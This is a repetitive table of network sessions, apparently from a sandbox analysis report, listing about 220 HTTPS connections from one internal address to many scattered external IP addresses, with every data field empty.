                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10311192.168.2.1547704197.162.225.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10312192.168.2.1554188133.41.98.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10313192.168.2.1555032120.207.190.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10314192.168.2.1553454114.212.215.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10315192.168.2.1545324144.122.133.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10316192.168.2.1557782165.89.240.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10317192.168.2.1553710122.197.35.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10318192.168.2.1553528169.180.165.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10319192.168.2.153645424.135.24.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10320192.168.2.1551934180.89.145.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10321192.168.2.1538210139.7.135.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10322192.168.2.155519861.166.8.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10323192.168.2.153727475.123.15.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10324192.168.2.1553916196.140.155.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10325192.168.2.1538726141.84.50.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10326192.168.2.1536158155.114.0.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10327192.168.2.154378224.132.197.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10328192.168.2.1550244142.150.177.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10329192.168.2.1534884184.124.84.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10330192.168.2.1553350211.19.181.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10331192.168.2.1535924153.113.19.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10332192.168.2.153506450.255.134.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10333192.168.2.1534488206.232.243.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10334192.168.2.1551772128.136.162.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10335192.168.2.154226048.153.244.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10336192.168.2.1546732203.46.181.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10337192.168.2.1550814139.249.234.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10338192.168.2.155758219.64.132.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10339192.168.2.1549984168.168.55.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10340192.168.2.153861643.180.125.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10341192.168.2.154164849.66.55.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10342192.168.2.156037650.126.66.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10343192.168.2.155138699.32.60.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10344192.168.2.1559148136.78.169.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10345192.168.2.155083287.140.179.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10346192.168.2.153392483.254.124.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10347192.168.2.1550524207.94.123.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10348192.168.2.1541214211.13.36.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10349192.168.2.1540388182.236.44.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10350192.168.2.154920480.0.77.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10351192.168.2.1558774172.63.112.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10352192.168.2.155200238.165.242.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10353192.168.2.155420436.230.234.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10354192.168.2.154448682.74.205.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10355192.168.2.1553338207.9.228.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10356192.168.2.1540958217.100.22.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10357192.168.2.1550522222.29.63.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10358192.168.2.1542590182.200.162.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10359192.168.2.1539234126.110.101.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10360192.168.2.153586470.83.166.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10361192.168.2.154807876.121.112.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10362192.168.2.155389272.208.3.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10363192.168.2.153615081.183.123.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10364192.168.2.15561548.196.52.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10365192.168.2.1541960161.153.22.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10366192.168.2.153980481.80.154.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10367192.168.2.1540670125.214.140.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10368192.168.2.1560700202.181.242.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10369192.168.2.154266214.43.8.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10370192.168.2.1547404185.100.237.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10371192.168.2.1543314112.91.31.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10372192.168.2.15460225.215.9.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10373192.168.2.1559452120.107.66.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10374192.168.2.155451880.144.31.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10375192.168.2.1558422221.97.1.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10376192.168.2.1541766163.61.164.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10377192.168.2.1555926147.179.116.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10378192.168.2.1538890180.166.243.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10379192.168.2.1533500174.158.118.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10380192.168.2.153306068.166.138.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10381192.168.2.154859099.17.210.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10382192.168.2.1547712155.72.160.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10383192.168.2.1533804142.87.119.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10384192.168.2.155134024.5.240.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10385192.168.2.153626687.4.70.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10386192.168.2.154519839.199.200.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10387192.168.2.1541586143.249.6.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10388192.168.2.1543224133.109.43.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10389192.168.2.154592486.6.126.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10390192.168.2.1549756141.5.166.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10391192.168.2.1555246206.62.94.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10392192.168.2.1558856131.255.249.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10393192.168.2.153418279.113.1.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10394192.168.2.1542936218.164.138.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10395192.168.2.154066658.97.244.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10396192.168.2.153376848.100.89.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10397192.168.2.155517283.105.238.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10398192.168.2.154876283.53.23.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10399192.168.2.155869040.65.76.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10400192.168.2.153859286.189.252.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10401192.168.2.1547212153.5.64.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10402192.168.2.155841839.45.120.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10403192.168.2.15469105.232.37.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10404192.168.2.1558838108.183.196.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10405192.168.2.1542782167.99.13.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10406192.168.2.154104082.115.74.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10407192.168.2.15562209.72.26.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10408192.168.2.155170099.8.14.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10409192.168.2.154980440.84.47.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10410192.168.2.1555350223.246.16.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10411192.168.2.1544962156.15.235.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10412192.168.2.154941091.101.99.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10413192.168.2.1538932192.3.80.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10414192.168.2.153592490.132.204.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10415192.168.2.15526524.215.11.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10416192.168.2.1547650141.244.149.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10417192.168.2.153422059.155.17.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10418192.168.2.153794281.136.141.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10419192.168.2.154531849.101.233.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10420192.168.2.1538366217.204.242.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10421192.168.2.155483254.112.236.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10422192.168.2.1539114109.92.138.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10423192.168.2.1545164218.156.23.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10424192.168.2.1539686174.26.4.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10425192.168.2.1552016126.127.97.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10426192.168.2.1533640156.137.29.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10427192.168.2.153671013.156.38.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10428192.168.2.153902291.166.1.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10429192.168.2.1535916139.6.127.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10430192.168.2.15378002.68.108.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10431192.168.2.1554946190.77.149.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10432192.168.2.1546990194.231.61.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10433192.168.2.155255851.28.11.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10434192.168.2.15590481.64.250.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10435192.168.2.154206031.99.215.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10436192.168.2.1538402153.120.204.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10437192.168.2.154497234.148.178.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10438192.168.2.155922817.63.244.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10439192.168.2.1554222119.52.224.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10440192.168.2.1538214202.86.185.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10441192.168.2.155031836.147.165.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10442192.168.2.154475497.237.38.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10443192.168.2.154658448.21.167.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10444192.168.2.1549726205.221.158.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10445192.168.2.153611449.162.156.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10446192.168.2.155039836.57.30.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10447192.168.2.1553294178.174.167.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10448192.168.2.1552572222.86.155.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10449192.168.2.155060279.62.149.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10450192.168.2.1558542210.183.13.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10451192.168.2.1540958177.128.220.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10452192.168.2.154304832.251.159.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10453192.168.2.153536660.130.73.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10454192.168.2.153583449.37.123.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10455192.168.2.1541382152.93.205.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10456192.168.2.155853018.28.124.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10457192.168.2.153917254.79.192.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10458192.168.2.155588085.203.5.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10459192.168.2.1536164198.229.8.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10460192.168.2.1554832106.100.246.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10461192.168.2.1558646115.10.178.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10462192.168.2.154125284.185.20.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10463192.168.2.155986467.14.40.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10464192.168.2.1540258171.190.158.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10465192.168.2.1535870144.72.244.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10466192.168.2.1558040178.51.168.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10467192.168.2.1533666199.204.61.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10468192.168.2.1560132188.78.48.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10469192.168.2.1559888101.134.8.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10470192.168.2.1542816198.191.42.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10471192.168.2.1557408200.122.247.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10472192.168.2.155846224.14.64.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10473192.168.2.1541520144.74.167.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10474192.168.2.1549910197.77.36.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10475192.168.2.1536334171.232.4.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10476192.168.2.1540496126.44.23.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10477192.168.2.1542346190.96.217.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10478192.168.2.155735294.223.72.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10479192.168.2.154156041.203.73.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10480192.168.2.1550316124.90.93.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10481192.168.2.153657023.206.6.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10482192.168.2.153564277.101.215.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10483192.168.2.154271075.34.204.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10484192.168.2.153541881.221.197.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10485192.168.2.1559962155.77.76.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10486192.168.2.1537932185.160.164.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10487192.168.2.1539994216.207.67.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10488192.168.2.1533392205.91.128.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10489192.168.2.1550420117.104.186.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10490192.168.2.1532936217.7.23.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10491192.168.2.1539802202.247.20.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10492192.168.2.1542072119.42.143.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10493192.168.2.1549278210.12.209.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10494192.168.2.1540928129.85.40.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10495192.168.2.153887065.192.234.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10496192.168.2.1536516149.59.59.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10497192.168.2.1537646189.211.98.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10498192.168.2.1547680177.113.98.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10499192.168.2.1543878160.33.172.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10500192.168.2.1534808144.236.139.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10501192.168.2.154052094.93.87.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10502192.168.2.1549286106.165.21.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10503192.168.2.1535732110.47.47.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10504192.168.2.1545940196.135.185.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10505192.168.2.1556068194.67.213.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10506192.168.2.1556886125.252.193.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10507192.168.2.155723419.178.238.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10508192.168.2.1541438187.181.253.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10509192.168.2.1547554179.49.146.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10510192.168.2.155660239.214.74.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10511192.168.2.1547782203.38.205.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10512192.168.2.15348821.52.106.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10513192.168.2.1552074191.201.244.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10514192.168.2.1550836122.126.133.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10515192.168.2.1540942181.30.89.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10516192.168.2.155274043.114.164.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10517192.168.2.1558166192.72.95.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10518192.168.2.1554366122.79.166.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10519192.168.2.155559431.41.204.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10520192.168.2.1553832221.75.116.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10521192.168.2.155548851.70.3.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10522192.168.2.1549880126.118.7.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10523192.168.2.1559846154.93.171.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10524192.168.2.153635898.193.191.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10525192.168.2.1545810166.241.83.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10526192.168.2.155565888.137.110.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10527192.168.2.155565099.180.58.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10528192.168.2.1549572133.83.83.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10529192.168.2.154011657.26.248.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10530192.168.2.1535286132.207.147.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10531192.168.2.155618441.178.228.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10532192.168.2.1548378180.140.64.1443
